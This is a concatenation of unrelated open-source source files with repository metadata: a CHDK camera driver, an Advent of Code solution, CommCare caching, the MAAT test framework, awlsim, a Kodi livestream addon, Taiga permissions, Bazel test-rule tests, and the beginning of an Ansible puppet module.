if shoot_monochrome:
rv = self._execute_lua(
"capmode = require(\"capmode\")\n"
"return capmode.set(\"SCN_MONOCHROME\")",
get_result=True
)
if not rv:
self.logger.warn("Monochrome mode not supported on this "
"device, will be disabled.")
# Disable flash
self._execute_lua("while(get_flash_mode()<2) do click(\"right\") end")
self._execute_lua("set_prop(require('propcase').QUALITY, {0})"
.format(self.MAX_QUALITY))
self._execute_lua("set_prop(require('propcase').RESOLUTION, {0})"
.format(self.MAX_RESOLUTION))
def finish_capture(self):
# Switch camera back to play mode.
# This will retract the lens and protect it from dust.
self._run("play")
def get_preview_image(self):
fpath = tempfile.mkstemp()[1]
cmd = "dumpframes -count=1 -nobm -nopal"
self._run("{0} {1}".format(cmd, fpath))
with open(fpath, 'rb') as fp:
data = fp.read()
os.remove(fpath)
return data
def capture(self, path):
# NOTE: To obtain the "real" Canon ISO value, we multiply the
# "market" value from the config by 0.65.
# See core/shooting.c#~l150 in the CHDK source for more details
sensitivity = int(self.config["sensitivity"].get())
shutter_speed = float(Fraction(self.config["shutter_speed"]
.get(unicode)))
shoot_raw = self.config['shoot_raw'].get(bool)
if self._can_remote:
cmd = ("remoteshoot -tv={0} -sv={1} {2} \"{3}\""
.format(shutter_speed, sensitivity*0.65,
"-dng" if shoot_raw else "", path))
else:
cmd = ("shoot -tv={0} -sv={1} -dng={2} -rm -dl \"{3}\""
.format(shutter_speed, sensitivity*0.65,
int(shoot_raw), path))
try:
self._run(cmd)
except CHDKPTPException as e:
if 'not in rec mode' in e.message:
self.prepare_capture(None)
self.capture(path)
else:
self.logger.warn("Capture command failed.")
raise e
extension = 'dng' if shoot_raw else 'jpg'
local_path = "{0}.{1}".format(path, extension)
# Set EXIF orientation
self.logger.debug("Setting EXIF orientation on captured image")
img = JPEGImage(local_path)
if self.target_page == 'odd':
img.exif_orientation = 6 # -90°
else:
img.exif_orientation = 8 # 90°
img.save(local_path)
def show_textbox(self, message):
messages = message.split("\n")
script = [
'screen_width = get_gui_screen_width();',
'screen_height = get_gui_screen_height();',
'draw_rect_filled(0, 0, screen_width, screen_height, 256, 256);'
]
script.extend(
['draw_string(0, 0+(screen_height/10)*{0}, "{1}", 258, 256);'
.format(idx, msg) for idx, msg in enumerate(messages, 1)]
)
self._execute_lua("\n".join(script), wait=False, get_result=False)
def _run(self, *commands):
chdkptp_path = Path(self.config["chdkptp_path"].get(unicode))
cmd_args = list(chain((unicode(chdkptp_path / "chdkptp"),),
self._cli_flags,
("-e{0}".format(cmd) for cmd in commands)))
env = {'LUA_PATH': unicode(chdkptp_path / "lua/?.lua")}
self.logger.debug("Calling chdkptp with arguments: {0}"
.format(cmd_args))
output = (subprocess.check_output(cmd_args, env=env,
stderr=subprocess.STDOUT)
.splitlines())
self.logger.debug("Call returned:\n{0}".format(output))
# Filter out connected message
output = [x for x in output if not x.startswith('connected:')]
# Check for possible CHDKPTP errors
if any('ERROR' in x for x in output):
raise CHDKPTPException("\n".join(output))
return output
def _execute_lua(self, script, wait=True, get_result=False, timeout=256):
if get_result and not "return" in script:
script = "return({0})".format(script)
cmd = "luar" if wait else "lua"
output = self._run("{0} {1}".format(cmd, script))
if not get_result:
return
output = [x for x in output if x.find(":return:")][0]
return self._parse_lua_output(output)
def _parse_table(self, data):
values = dict(re.findall(r'([\w_]+?)=(\d+|".*?"),*', data[6:]))
for k, v in values.iteritems():
if v.startswith('"') and v.endswith('"'):
values[k] = v.strip('"') # String
else:
values[k] = int(v) # Integer
return values
def _parse_lua_output(self, output):
ret_val = re.match(r'^\d+:return:(.*)', output).group(1)
if ret_val.startswith('table:'):
return self._parse_table(ret_val) # Table
elif ret_val.startswith("'"):
return ret_val.strip("'") # String
elif ret_val in ('true', 'false'):
return ret_val == 'true'
else:
return int(ret_val) # Integer
def _get_target_page(self):
tmp_handle = tempfile.mkstemp(text=True)
try:
self._run("download \"OWN.TXT\" {0}".format(tmp_handle[1]))
with open(tmp_handle[1], 'r') as fp:
target_page = fp.readline().strip().lower()
except DeviceException:
raise ValueError("Could not find OWN.TXT")
finally:
os.remove(tmp_handle[1])
if not target_page:
raise ValueError("Could not read OWN.TXT")
return target_page
def _set_zoom(self, level):
if level >= self._zoom_steps:
raise ValueError("Zoom level {0} exceeds the camera's range!"
" (max: {1})".format(level, self._zoom_steps-1))
self._execute_lua("set_zoom({0})".format(level), wait=True)
def _acquire_focus(self):
""" Acquire auto focus and lock it. """
self._execute_lua("enter_alt()")
# Try to put into record mode
try:
self._run("rec")
except CHDKPTPException as e:
self.logger.debug(e)
self.logger.info("Camera already seems to be in recording mode")
self._set_zoom(int(self.config['zoom_level'].get()))
self._execute_lua("set_aflock(0)")
self._execute_lua("press('shoot_half')")
time.sleep(0.8)
self._execute_lua("release('shoot_half')")
time.sleep(0.5)
return self._execute_lua("get_focus()", get_result=True)
def _set_focus(self):
focus_distance = int(self.config['focus_distance'].get())
self._execute_lua("set_aflock(0)")
if focus_distance == 0:
return
self._execute_lua("set_focus({0:.0f})".format(focus_distance))
time.sleep(0.5)
self._execute_lua("press('shoot_half')")
time.sleep(0.25)
self._execute_lua("release('shoot_half')")
time.sleep(0.25)
self._execute_lua("set_aflock(1)")
class A2200(CHDKCameraDevice):
""" Canon A2200 driver.
Works around some quirks of that CHDK port.
"""
MAX_RESOLUTION = 0
MAX_QUALITY = 1
def __init__(self, config, device):
super(A2200, self).__init__(config, device)
if self.target_page is not None:
self.logger = logging.getLogger(
'A2200Device[{0}]'.format(self.target_page))
else:
self.logger = logging.getLogger('A2200Device')
def finish_capture(self):
# Putting the device back into play mode crashes the a2200 with
# chdk 1.3, this is why we stub it out here.
pass
def _set_zoom(self, level):
""" Set zoom level.
The A2200 currently has a bug, where setting the zoom level
directly via set_zoom crashes the camera quite frequently, so
we work around that by simulating button presses.
:param level: The zoom level to be used
:type level: int
"""
if level >= self._zoom_steps:
raise ValueError(
"Zoom level {0} exceeds the camera's range!"
" (max: {1})".format(level, self._zoom_steps-1))
zoom = self._execute_lua("get_zoom()", get_result=True)
if zoom < level:
self._execute_lua("while(get_zoom()<{0}) do click(\"zoom_in\") end"
.format(level+1),
wait=True)
elif zoom > level:
self._execute_lua("while(get_zoom()>{0}) "
"do click(\"zoom_out\") end".format(level+1),
wait=True)
class QualityFix(CHDKCameraDevice):
""" Fixes a bug that prevents remote capture with the highest resolution
and quality from succeeding. See this CHDK forum post for more details:
http://chdk.setepontos.com/index.php?topic=4338.msg111318#msg111318
"""
MAX_RESOLUTION = 0
MAX_QUALITY = 1
def __init__(self, config, device):
super(QualityFix, self).__init__(config, device)
if self.target_page is not None:
self.logger = logging.getLogger(
'QualityFixDevice[{0}]'.format(self.target_page))
else:
self.logger = logging.getLogger('QualityFixDevice')
| agpl-3.0 | -6,617,896,385,044,184,000 | 37.71564 | 79 | 0.547068 | false |
BrendanLeber/adventofcode | 2020/09-encoding_error/encoding_error.py | 1 | 2067 | # -*- coding: utf-8 -*-
"""Advent of Code 2020 - Day 9 - Encoding Error."""
import argparse
import pdb
import traceback
from itertools import combinations
from typing import Any, List, Set, Tuple
def parse_input(fname: str):
"""Read the input file and return the parsed data."""
data = []
with open(fname, "rt") as inf:
for line in inf:
data.append(int(line.strip()))
return data
def get_sums(slice: List[int]) -> Set[int]:
result: Set[int] = set()
for (lhs, rhs) in combinations(slice, 2):
result.add(lhs + rhs)
return result
def check_window(target: int, numbers: List[int], sz: int) -> Tuple[bool, Any]:
for x in range(len(numbers) - sz + 1):
window: List[int] = numbers[x : x + sz]
if sum(window) == target:
return (True, min(window) + max(window))
return (False, None)
def solve(numbers: List[int], preamble: int):
one = None
for idx in range(preamble, len(numbers)):
start: int = idx - preamble
end: int = idx
sums: Set[int] = get_sums(numbers[start:end])
if numbers[idx] not in sums:
one = numbers[idx]
break
two = None
window_size: int = 1
while True:
window_size += 1
found, two = check_window(one, numbers, window_size)
if found:
break
return (one, two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Advent of Code - 2020 - Day 9 - Encoding Error.")
parser.add_argument(
"input",
type=str,
default="input.txt",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"preamble",
type=int,
default=25,
nargs="?",
help="The number of items in the preamble. (Default %(default)s)",
)
args = parser.parse_args()
try:
data = parse_input(args.input)
print(solve(data, args.preamble))
except Exception:
traceback.print_exc()
pdb.post_mortem()
| mit | 3,329,311,302,426,200,600 | 25.164557 | 99 | 0.570392 | false |
benrudolph/commcare-hq | corehq/apps/reports/cache.py | 2 | 1828 | from django.utils.cache import _generate_cache_header_key
from corehq.util.quickcache import quickcache, QuickCache
DEFAULT_EXPIRY = 60 * 60 # an hour
CACHE_PREFIX = 'hq.reports' # a namespace where cache keys go
class _ReportQuickCache(QuickCache):
"""
Just like QuickCache, but intercepts the function call to abort caching
under certain conditions
"""
def __call__(self, *args, **kwargs):
report = args[0]
if report.is_cacheable and _is_valid(report):
return super(_ReportQuickCache, self).__call__(*args, **kwargs)
else:
return self.fn(*args, **kwargs)
def _is_valid(report):
"""
checks if this meets the preconditions for being allowed in the cache
"""
try:
return (
report.request.domain
and report.request.couch_user._id
and report.request.get_full_path().startswith(
'/a/{domain}/'.format(domain=report.request.domain)
)
)
except AttributeError:
return False
def _custom_vary_on(report):
"""
signature is intentionally restricted to a single argument
to prevent @request_cache() from decorating a method that has non-self args
"""
return [
_generate_cache_header_key(CACHE_PREFIX, report.request),
report.request.domain,
report.request.couch_user._id,
]
def request_cache(expiry=DEFAULT_EXPIRY):
"""
A decorator that can be used on a method of a GenericReportView subclass
or any other class that provides the following properties:
- self.request (a django request object, with .domain and .couch_user)
- self.is_cacheable (boolean)
"""
return quickcache(vary_on=_custom_vary_on,
timeout=expiry, helper_class=_ReportQuickCache)
| bsd-3-clause | -2,381,033,371,840,866,300 | 29.466667 | 79 | 0.641138 | false |
hcasse/maat | maat/test.py | 1 | 9061 | # MAAT top-level script
# Copyright (C) 2016 H. Casse <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module providing test services."""
import difflib
import os
import os.path
import shutil
import subprocess
import sys
import maat
from maat import action
from maat import common
from maat import env
from maat import io
from maat import recipe
TEST_CASES = []
BEFORE_TEST = []
NULL = open(os.devnull, "w")
class Case(recipe.Recipe):
"""Recipe to implement test case."""
name = None
tests = None
succeeded = 0
longer = 0
def __init__(self, name, deps, private):
recipe.Recipe.__init__(self, [maat.path(name)], deps)
self.tests = []
self.name = name
recipe.get_file(name).set_goal()
if not private:
global TEST_CASES
TEST_CASES.append(self.ress[0])
self.ress[0].DESCRIPTION = "test case"
def add(self, test):
self.tests.append(test)
self.deps = self.deps + test.deps
self.longer = max(self.longer, len(test.name))
def action(self, ctx):
#ctx.print_info("Testing %s" % self.ress[0])
self.succeeded = 0
for test in self.tests:
test.test(ctx)
if self.succeeded == len(self.tests):
ctx.out.write(io.BOLD + io.GREEN + "\tSUCCESS: all tests passed!\n" + io.NORMAL)
else:
ctx.out.write(io.BOLD + io.RED + "\tFAILURE: %d test(s) failed on %d\n" % (len(self.tests) - self.succeeded, len(self.tests)) + io.NORMAL)
common.error("Test failed.")
class Test(recipe.Recipe):
"""Implements a simple test, that is, perform its action
and depending on the result increment succeeded counter
of test case."""
case = None
name = None
def __init__(self, case, name, deps):
recipe.Recipe.__init__(self, [name], deps)
self.name = name
recipe.get_file(name).set_phony()
self.case = case
case.add(self)
self.ress[0].set_goal()
self.ress[0].DESCRIPTION = "test"
def action(self, ctx):
"""Default action for a test."""
self.test(ctx)
def success(self, ctx):
"""Record the current test as a success and display
ok message."""
self.case.succeeded += 1
ctx.print_action_success()
def failure(self, ctx, msg = ""):
"""Record the current test as a failure display message."""
ctx.print_action_failure(msg)
def perform(self, ctx):
"""Display message of a starting test."""
ctx.print_action("\tTesting %s%s " % (self.name, ' ' * (self.case.longer - len(self.name))))
def info(self, ctx, msg):
"""Display an information."""
ctx.print_info("\t\t%s" % msg)
def test(self, ctx):
"""This method is called to perform the test."""
pass
class OutputTest(Test):
"""Test launching a command, storing the output and/or error
stream and comparing it to expected output. Fails if there
is a difference.
Constructor takes as parameter the file to compare output stream
and the file to compare error stream with. Matching channels are
ignored if they get a value of None.
An input stream may also be passed and the matching file will
dumped to input of launched command."""
def __init__(self, case, name, cmd, out = None, out_ref = None, err = None, err_ref = None, input = None, deps = None):
Test.__init__(self, case, name, deps)
self.cmd = cmd
self.out = maat.path(out)
self.out_ref = maat.path(out_ref)
self.err = maat.path(err)
self.err_ref = maat.path(err_ref)
self.input = input
def test(self, ctx):
self.perform(ctx)
try:
# launch the command
if self.out:
self.out.parent().makedir()
out_stream = open(str(self.out), "w")
else:
out_stream = NULL
if self.err:
self.err.parent().makedir()
err_stream = open(str(self.err), "w")
else:
err_stream = NULL
if self.input:
in_stream = open(str(self.input), "r")
else:
in_stream = NULL
cmd = action.make_line(self.cmd)
if maat.verbose:
ctx.print_info("running '%s'" % cmd)
rc = subprocess.call(cmd, stdin = in_stream, stdout = out_stream, stderr = err_stream, shell = True)
if rc != 0:
self.failure(ctx, "return code = %d, command = %s" % (rc, cmd))
return
# compare output if any
if self.out:
if not self.out_ref.exists():
self.info(ctx, "no reference file for output, creating it!")
maat.mkdir(str(self.out_ref.parent()))
shutil.copyfile(str(self.out), str(self.out_ref))
else:
out = str(self.out)
ref = str(self.out_ref)
rc = subprocess.call("diff --brief %s %s " % (ref, out), stdout = NULL, stderr = NULL, shell = True)
if rc != 0:
self.failure(ctx, "different output stream")
return
# compare error if any
if self.err:
if not self.err_ref.exists():
self.info(ctx, "no reference file for error, creating it!")
maat.mkdir(str(self.err_ref.parent()))
shutil.copyfile(str(self.err), str(self.err_ref))
else:
err = str(self.err)
ref = str(self.err_ref)
rc = subprocess.call("diff --brief %s %s" % (ref, err), stdout = NULL, stderr = NULL, shell = True)
if rc != 0:
self.failure(ctx, "different error stream")
return
# display result
self.success(ctx)
except OSError as e:
self.failure(ctx, "test error: %s" % e)
except IOError as e:
self.failure(ctx, "test error: %s" % e)
class CommandTest(Test):
"""A command test just run a command and examine the return code.
If the return code is 0, the test is passed. Else the test is
considered as failed."""
def __init__(self, case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
if dir != None:
deps = common.as_list(deps) + [ dir ]
Test.__init__(self, case, name, deps)
self.args = args
self.inp = inp
self.out = out
self.err = err
self.dir = dir
def check(self, rc):
return rc == 0
def test(self, ctx):
self.perform(ctx)
if self.dir != None:
old_dir = os.getcwd()
try:
os.chdir(self.dir)
except OSError as e:
raise common.MaatError("cannot change to '%s': %s" % (self.dir, e))
if self.out:
out = common.Path(self.out)
maat.mkdir(str(out.parent()))
out_stream = open(str(out), "w")
else:
out_stream = NULL
if self.err:
err = common.Path(self.err)
maat.mkdir(str(err.parent()))
err_stream = open(str(err), "w")
else:
err_stream = NULL
if self.inp:
in_stream = open(str(self.input), "r")
else:
in_stream = NULL
cmd = action.make_line(self.args)
if maat.verbose:
ctx.print_info("running %s" % cmd)
rc = subprocess.call(cmd, stdin = in_stream, stdout = out_stream, stderr = err_stream, shell = True)
if self.check(rc):
self.success(ctx)
else:
self.failure(ctx, "return code = %d, command = %s" % (rc, cmd))
if self.dir != None:
os.chdir(old_dir)
class FailingCommandTest(CommandTest):
"""Test launching a command and that succeed if the command fails."""
def __init__(self, case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
CommandTest.__init__(self, case, name, args, out, err, inp, deps, dir)
def check(self, rc):
return rc != 0
def case(name, deps = None, private = False):
"""Build a test a case, that is, an abstract goal
with a recipe launching tests. If private is to True, the case
is not added to the global list of test cases."""
return Case(name, deps, private)
def command(case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
"""Build a command test that run the command and examine return code."""
return CommandTest(case, name, args, out, err, inp, deps, dir)
def failing_command(case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
"""Build a command test that run the command and check from the return code if the command failed."""
return FailingCommandTest(case, name, args, out, err, inp, deps)
def output(case, name, cmd, out = None, out_ref = None, err = None, err_ref = None, input = None, deps = []):
"""Build a test that launches a command compares output."""
return OutputTest(case, name, cmd, out, out_ref, err, err_ref, input, deps)
def before(*actions):
"""Add an action to actions performed before test."""
BEFORE_TEST.append(action.make_actions(*actions))
def post_init():
"""Initialize the test goal."""
path = env.cur.path / "test"
if path not in recipe.file_db:
before_test = recipe.phony("before-test", [], action.make_actions(BEFORE_TEST))
test = maat.goal("test", [before_test] + TEST_CASES)
test.DESCRIPTION = "run tests"
common.post_inits.append(common.FunDelegate(post_init))
| gpl-3.0 | 5,791,492,022,271,630,000 | 30.030822 | 141 | 0.65964 | false |
gion86/awlsim | awlsim/core/instructions/insn_feature.py | 2 | 1866 | # -*- coding: utf-8 -*-
#
# AWL simulator - instructions
#
# Copyright 2012-2014 Michael Buesch <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.instructions.main import * #@nocy
from awlsim.core.operators import *
#from awlsim.core.instructions.main cimport * #@cy
class AwlInsn_FEATURE(AwlInsn): #+cdef
__slots__ = ()
def __init__(self, cpu, rawInsn):
AwlInsn.__init__(self, cpu, AwlInsn.TYPE_FEATURE, rawInsn)
self.assertOpCount((1, 2))
def run(self):
#@cy cdef S7StatusWord s
target = self.cpu.fetch(self.ops[0])
value = None
if len(self.ops) >= 2:
value = self.cpu.fetch(self.ops[1])
if target == 0:
# Set/get the number of accumulator registers.
if value is not None:
self.cpu.specs.setNrAccus(value)
self.cpu.accu1.set(self.cpu.specs.nrAccus)
elif target == 1:
# Set/get the enable-status of OB-temp writing.
if value is not None:
self.cpu.enableObTempPresets(value)
self.cpu.accu1.set(int(self.cpu.obTempPresetsEnabled()))
else:
raise AwlSimError("Unsupported __FEATURE target %d" % target)
| gpl-2.0 | -1,157,801,609,826,151,000 | 31.736842 | 82 | 0.722937 | false |
timrijckaert/plugin.video.vrt.livestreams | addon.py | 1 | 3408 | import sys
import xbmc
import xbmcgui
import xbmcplugin
from resources.lib.models.constants import ACTIONS
from resources.lib.models.radiochannel import get_all_radio_channels
from resources.lib.models.videochannel import get_all_video_channels
from resources.lib.service.playlistfetcher import get_playlist_for_channel
from resources.lib.utils.debugger import Debugger
from resources.lib.utils.utils import Utils
self = sys.argv[0]
addon_handle = int(sys.argv[1])
qs = sys.argv[2]
def get_radio_list_items():
radio_items = []
for channel in get_all_radio_channels():
live_stream_title = channel.title
live_stream_url = utils.create_qs(self, {
'action': ACTIONS["radio_list_item_clicked"],
'url': channel.url,
'channel_code': channel.channel_code
})
list_item = xbmcgui.ListItem(label=live_stream_title,
label2=channel.description,
iconImage=channel.thumbnail_picture,
thumbnailImage=channel.thumbnail_picture,
path=live_stream_url)
list_item.setProperty("fanart_image", channel.fanart_picture)
radio_items.append((live_stream_url, list_item))
return radio_items
def get_video_list_items():
video_items = []
for channel in get_all_video_channels():
live_stream_title = channel.title
live_stream_url = channel.video_url
list_item = xbmcgui.ListItem(label=live_stream_title,
iconImage=channel.thumbnail_picture,
thumbnailImage=channel.thumbnail_picture,
path=live_stream_url)
list_item.setInfo(type='video', infoLabels={"title": live_stream_title})
list_item.setProperty("fanart_image", channel.fanart_picture)
list_item.setProperty("isPlayable", 'true')
video_items.append((live_stream_url, list_item))
return video_items
def display_generic_playable_items(items):
xbmcplugin.addDirectoryItems(handle=addon_handle, items=items, totalItems=len(items))
xbmcplugin.endOfDirectory(addon_handle, True)
if __name__ == "__main__":
utils = Utils()
debugger = Debugger()
if len(qs) > 1:
action = utils.get_action(qs)
xbmc.log("Action %s" % action)
if action is None:
if utils.content_type == 'video':
display_generic_playable_items(get_video_list_items())
else:
display_generic_playable_items(get_radio_list_items())
if action == ACTIONS["radio_list_item_clicked"]:
xbmc.Player().play(utils.url)
playlist_for_channel = get_playlist_for_channel(utils.channel_code)
songs = playlist_for_channel.songs
play_list = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
play_list.clear()
play_list.unshuffle()
if len(songs) > 0:
for song in songs:
play_list.add(url=utils.construct_known_params(self),
listitem=xbmcgui.ListItem(label="%s - %s" % (song.artist, song.title),
label2=song.artist,
iconImage=song.image_url,
thumbnailImage=song.image_url))
| gpl-2.0 | 921,547,563,464,623,200 | 38.627907 | 100 | 0.595951 | false |
dycodedev/taiga-back | taiga/projects/tasks/permissions.py | 8 | 2315 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from taiga.base.api.permissions import (TaigaResourcePermission, HasProjectPerm,
IsAuthenticated, IsProjectOwner, AllowAny,
IsSuperUser)
class TaskPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
create_perms = HasProjectPerm('add_task')
update_perms = HasProjectPerm('modify_task')
partial_update_perms = HasProjectPerm('modify_task')
destroy_perms = HasProjectPerm('delete_task')
list_perms = AllowAny()
csv_perms = AllowAny()
bulk_create_perms = HasProjectPerm('add_task')
bulk_update_order_perms = HasProjectPerm('modify_task')
upvote_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
downvote_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
watch_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
unwatch_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
class TaskVotersPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
list_perms = HasProjectPerm('view_tasks')
class TaskWatchersPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
list_perms = HasProjectPerm('view_tasks')
| agpl-3.0 | -350,722,921,183,585,900 | 44.352941 | 82 | 0.721141 | false |
safarmer/bazel | tools/build_rules/test_rules_test.py | 13 | 5024 | # Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from src.test.py.bazel import test_base
class TestRulesTest(test_base.TestBase):
def _FailWithOutput(self, output):
self.fail('FAIL:\n | %s\n---' % '\n | '.join(output))
def _AssertPasses(self, target):
exit_code, stdout, stderr = self.RunBazel(
['test', target, '--test_output=errors'])
if exit_code != 0:
self._FailWithOutput(stdout + stderr)
def _AssertFails(self, target):
exit_code, stdout, stderr = self.RunBazel(['test', target])
if exit_code == 0:
self._FailWithOutput(stdout + stderr)
def testContent(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules_private.bzl'),
'foo/test_rules_private.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' content = "The quick brown\\nfox jumps over\\nthe lazy dog.\\n",',
' file = "tested_file.txt",',
')',
'',
'file_test(',
' name = "neg",',
' content = "quick",',
' file = "tested_file.txt",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testRegexpWithoutMatches(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' file = "tested_file.txt",',
' regexp = "o[vwx]",',
')',
'',
'file_test(',
' name = "neg",',
' file = "tested_file.txt",',
' regexp = "o[abc]",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testRegexpWithMatches(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile(
'foo/BUILD',
[
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' file = "tested_file.txt",',
# grep -c returns the number of matching lines, not the number of
# matches
' matches = 2,',
' regexp = "o[vwx]",',
')',
'',
'file_test(',
' name = "neg",',
' file = "tested_file.txt",',
' matches = 3,',
' regexp = "o[vwx]",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testBadArgs(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "neither_content_nor_regex",',
' file = "tested_file.txt",',
')',
'',
'file_test(',
' name = "both_content_and_regex",',
' file = "tested_file.txt",',
' content = "x",',
' regexp = "x",',
')',
'',
'file_test(',
' name = "content_with_matches",',
' file = "tested_file.txt",',
' content = "hello",',
' matches = 1,',
')',
])
self._AssertFails('//foo:neither_content_nor_regex')
self._AssertFails('//foo:both_content_and_regex')
self._AssertFails('//foo:content_with_matches')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,204,501,319,727,431,000 | 31.412903 | 79 | 0.52926 | false |
e-gob/plataforma-kioscos-autoatencion | scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/system/puppet.py | 25 | 8786 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: puppet
short_description: Runs puppet
description:
- Runs I(puppet) agent or apply in a reliable manner
version_added: "2.0"
options:
timeout:
description:
- How long to wait for I(puppet) to finish.
required: false
default: 30m
puppetmaster:
description:
- The hostname of the puppetmaster to contact.
required: false
default: None
modulepath:
description:
- Path to an alternate location for puppet modules
required: false
default: None
version_added: "2.4"
manifest:
description:
- Path to the manifest file to run puppet apply on.
required: false
default: None
facts:
description:
- A dict of values to pass in as persistent external facter facts
required: false
default: None
facter_basename:
description:
- Basename of the facter output file
required: false
default: ansible
environment:
description:
- Puppet environment to be used.
required: false
default: None
logdest:
description:
- Where the puppet logs should go, if puppet apply is being used
required: false
default: stdout
choices: [ 'stdout', 'syslog' ]
version_added: "2.1"
certname:
description:
- The name to use when handling certificates.
required: false
default: None
version_added: "2.1"
tags:
description:
- A comma-separated list of puppet tags to be used.
required: false
default: None
version_added: "2.1"
execute:
description:
- Execute a specific piece of Puppet code. It has no effect with
a puppetmaster.
required: false
default: None
version_added: "2.1"
requirements: [ puppet ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Run puppet agent and fail if anything goes wrong
- puppet
# Run puppet and timeout in 5 minutes
- puppet:
timeout: 5m
# Run puppet using a different environment
- puppet:
environment: testing
# Run puppet using a specific certname
- puppet:
certname: agent01.example.com
# Run puppet using a specific piece of Puppet code. Has no effect with a
# puppetmaster.
- puppet:
execute: 'include ::mymodule'
# Run puppet using a specific tags
- puppet:
tags: update,nginx
'''
import json
import os
import pipes
import stat
from ansible.module_utils.basic import AnsibleModule
def _get_facter_dir():
if os.getuid() == 0:
return '/etc/facter/facts.d'
else:
return os.path.expanduser('~/.facter/facts.d')
def _write_structured_data(basedir, basename, data):
if not os.path.exists(basedir):
os.makedirs(basedir)
file_path = os.path.join(basedir, "{0}.json".format(basename))
# This is more complex than you might normally expect because we want to
# open the file with only u+rw set. Also, we use the stat constants
# because ansible still supports python 2.4 and the octal syntax changed
out_file = os.fdopen(
os.open(
file_path, os.O_CREAT | os.O_WRONLY,
